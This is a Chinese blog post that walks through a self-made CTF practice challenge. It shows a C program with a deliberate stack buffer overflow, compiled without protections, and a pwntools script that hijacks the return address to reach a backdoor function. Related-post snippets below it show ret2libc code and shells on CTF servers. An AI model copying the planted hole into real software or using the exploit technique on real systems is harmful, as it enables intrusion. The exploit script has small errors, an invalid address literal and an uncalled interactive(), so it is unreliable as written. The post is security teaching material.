pwn2test

最新推荐文章于 2023-04-11 14:47:52 发布
最新推荐文章于 2023-04-11 14:47:52 发布
阅读量174 收藏
点赞数
分类专栏: pwn 文章标签: linux c语言 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/goat_2003/article/details/120325668
版权 
#include<stdio.h>

int f()
{
    char arr[0x20];
    read(0,arr,0x100);
    printf("%s",arr);
    return 0;
}
//编译命令    gcc -m32 004.c  -o 004 -fno-stack-protector -no-pie
//       005 gcc 004.c  -o 005  -fno-stack-protector -no-pie
void backdoor(int i){
    if (i==40)
        printf("Pwn it !\n");//system("/bin/sh")
}

int main()
{
    f();
    return 0;
}

这是一道自己编写的pwn2test题目,目的是打印出 “Pwn it !\n” 。先整理一下解题思路,首先通过f函数里的read实现栈溢出,将返回地址覆盖为backdoor的函数地址,但是可以看到需要传入参数为40才能打印。如何传递参数,需要得到参数在栈中与 ebp 的偏移对参数赋值,所以首先得获得执行到参数赋值时ebp在栈中的位置。并将其覆盖为40,也就是0x28。

首先使用ida打开文件,找到 f 函数,看到了read函数后,双击参数buf确定覆盖返回地址需要填充的字节数。可以确定填充字节数为 0x28+0x4 也就是0x30个字节。
在这里插入图片描述

然后,找到backdoor函数,可以看到
在这里插入图片描述
参数地址与ebp的偏移量为8,那么如何编写payload,需要确定参数地址与我们覆盖的retn地址在栈中的偏移量。如下图。
在这里插入图片描述
也就是只要在覆盖掉retn返回地址后再覆盖4个字节的栈空间,就是参数的地址了。

编写exp

from pwn import *   #引入关于exp编写的代码
'''因环境没搭好进行调试的代码
context.log_level = 'debug'
context.terminal =  ["tmux","new-window"]
context.arch = 'amd64'
context.os = 'linux'

def debug(cmd=""):
    if len(sys.argv) <= 2:
        log.progress("Loading Debug....")
        gdb.attach(p,cmd)
'''

p=process("./004")    #打开本地程序并进行交互

backdoor=08049226    #ida中找到想要跳转的函数地址

payload='a'*0x28+'a'*4+p32(backdoor)+'a'*4+p32(40)   

p.sendline(payload)   #将编写好的payload输入

p.interactive     #直接进行交互,相当于回到了shell模式

在这里插入图片描述

执行成功。

再搭环境是狗
关注
专栏目录
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3103
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
PWN篇:ret2libc
weixin_44644249的博客
01-28 451
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
BUUCTF PWN test_your_nc
Ethan552525的博客
08-09 1024
题目: 解题: 1:用IDA打开test 用file命令查看文件test为64位。 用IDA pro (64-bit)打开: 2:用netcat连接 Netcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。 ...
BUUCTF pwn test_your_nc exp
weixin_45551695的博客
07-28 278
from pwn import * context.os='linux' context.arch='amd64' context.log_level='debug' //其实直接连上去就可以了,前面那段都可以不要 io=remote('node3.buuoj.cn',25976) io.interactive()
BUUCTF-PWN-test_your_nc
m0_64180167的博客
04-11 232
有了这个代码 我们的权限就会得到提升,我们就能够查看电脑上的其他文件,获取flag。可以把它理解为一把开启flag宝箱的钥匙。pwn 是为了能够得到最高权限的目的 pwn掉服务器 我们就能获得最高权限 来控制电脑。得到信息 我们把文件放入 ida64。很轻松的就能使用代码ls 来展示文件。得到 文件 与 ip 端口。从这道题我们能理解PWN。并且我们发现flag。
[BUUCTF] [PWN] test_your_nc
Stan冲冲冲
09-18 354
nc node3.buuoj.cn 25795 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vkzXFCeo-1600426423286)(https://i.loli.net/2020/09/18/NACD2xQiStRhu5T.png)] 直接nc过去,ls即可看到文件,发现flag,cat即可发现flag cat flag ...
【BUUCTF - PWNtest_your_nc
古月浪子的博客
03-19 1869
只要连上就能有flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' io=remote('xxx',xxx) io.interactive() 附件:test_your_nc ...
PwnWAF:用于AWD的pwn日志工具
05-16
用于AWD的pwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要记录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: ...
ctfshow pwn4
qq_39980610的博客
08-22 682
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
PWN基础2:基础理论
prettyX的博客
07-04 847
基础理论 part 1 1、在CTF比赛中,PWN主要是指漏洞利用,也称为exploit。 2、PWN题型的解题过程一般是寻找程序中存在的漏洞,并利用该漏洞达到一定的效果,如拿到shell、获取flag等。 3、解答PWN题型的基本能力包括:程序逆向能力、漏洞查找能力、利用代码编写能力。 4、PWN题型中的漏洞类型主要可以分为栈漏洞、堆漏洞、格式化字符串漏洞、整形漏洞、逻辑漏洞等。 5、就难易程度来说,栈漏洞、格式化字符串漏洞、整形漏洞的难度要低于堆漏洞、逻辑漏洞。 6、就考察点来说,栈漏洞、
[JarvisOJ][pwn]Test Your Memory
九层台
07-06 840
经历了前面2次的艰难,出题人或许嫌我们太累了,来了个简单的 走进程序找信息。开启的保护只有NX .rodata:080487E0 00000009 C cat flag 这里有命令字符串cat flag 0804A058 system 这里有system函数,然后找漏洞吧 int __cdecl mem_test(char *s2) {...
服务器中PWN题的简单搭建
mylyylmy的博客
04-12 6162
首先,创建一个虚拟环境使用passwd root将root密码修改其中SSH端口号8136是远程SSH登陆时用的端口号 WEB端口号为服务器端映射到docker8080端口的端口号即所以我们要先上传题目到我们的docker中这时使用XShell或者scp命令都可以,这里演示XShell使用Xftp上传文件到服务器端创建或者上传flag文件新增低权限账户(选),新建pwn文件夹,更改运行程序(pwn...
和ZLTT一起学pwn 1.基础栈溢出
qq_53610850的博客
10-26 494
1.基础栈溢出 前置知识 C语言,汇编语言 函数调用过程 首先,使用如下程序来复习一下一个32位函数在调用过程中栈上发生的变化 #include<stdio.h> int add(int a,int b) { int c=0; return a+b; } int main() { add(1,2); } 在调用前,首先从右到左压栈进行传参 0x8048404 <main+13> push 2 0x8048406
pwn的五道基础题
lllwky的博客
03-27 7096
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 2051
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 记录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl
攻防世界pwn新手题wp(通俗易懂)
njh18790816639的博客
03-10 1832
get_shell 这道题先看看附件,探查一下信息,再用ida打开,就可以发现伪代码其实很简单的: 然后在远程连接这个端口进行攻击了。 并且我们能看到它的大致防护信息,然后来个脚本: 此时就可以进行攻击了。 这样子flag就拿到了。 CGfsb 刚开始先在windows里进行一番静态调试: 大概的知道了一些漏洞,和一点信息,我们就可以进行破解了。 ...
pwn 缓冲区溢出+libc泄露 执行system(/bin/sh)
L2329794714的博客
05-02 564
转载于自己博客: pwn 缓冲区溢出+libc泄露 执行system(/bin/sh) - 松下之约一、libclibc是Standard C library的简称,它是符合ANSI C标准的一个函数库。libc库提供C语...http://lusong.store/index.php/archives/37/学习网络安全知识,遵守网络安全法律法规,做知法守法的现代好青年。 ...
pwn学习-bugku
qq_45653588的博客
12-20 844
文章目录 0x00 pwn1 第一题很简单,nc连接后直接就有执行权限。 ls获取文件列表,cat flag就拿到了flag。 0x01 pwn2 第二题,下载文件,checksec查看文件保护和文件类型。 将文件拖入ida,发现了get_shell_函数 F5查看main函数代码,发现s申请了0x30个字节,而read函数,最大能读取0X100个字符,就造成了栈溢出,我们只要将返回地址覆盖为get_shell_的地址就可以得到flag。 查看get_shell_函数,可以直接输出flag,只要将m
攻防世界 Pwn 进阶 第一页
yongbaoii的博客
10-19 3039
写在最前面 我在某天中午睡了一觉之后大彻大悟 我感觉pwn最重要的是能不能找得到漏洞点,学会怎么利用这个漏洞点以及明白他的原理倒是要往后放一放,所以要来一个漏洞总结,总结我现在见到过的所有漏洞、漏洞的原理以及它的表现形式,就在攻防世界第一页之后吧,以题的形式去进行一些总结。 00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区。 攻防世界 Pwn 新手 1、栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc。 常见漏洞点有read()函数、gets()函数、strca
ctfshow的pwn2
最新发布
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值